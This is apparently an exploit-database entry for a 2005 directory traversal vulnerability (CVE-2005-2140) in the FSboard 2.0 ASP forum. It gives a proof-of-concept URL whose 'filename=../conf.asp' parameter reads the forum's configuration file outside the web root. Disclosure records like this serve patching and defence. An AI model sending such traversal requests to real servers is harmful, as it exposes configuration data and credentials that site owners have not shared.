fsboard 2.0 - Directory Traversal
Author: ActualMInd
type: webapps
platform: asp
port:
date_added: 2005-06-30
date_updated: 2013-06-03
verified: 1
codes: CVE-2005-2140;OSVDB-17828
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/14111/info
FSboard is prone to a directory traversal vulnerability.
This could allow a remote attacker to read files outside the Web root. This could only be used to access files to which the Web server has permission.
All versions of FSboard are vulnerable to this issue at the moment.
http://www.example.com/forum/default.asp?db=general&mode=download&idx=507&fileNum=1&filename=../conf.asp&nav=viewcontents&srhctgr=&srhstr=&page=1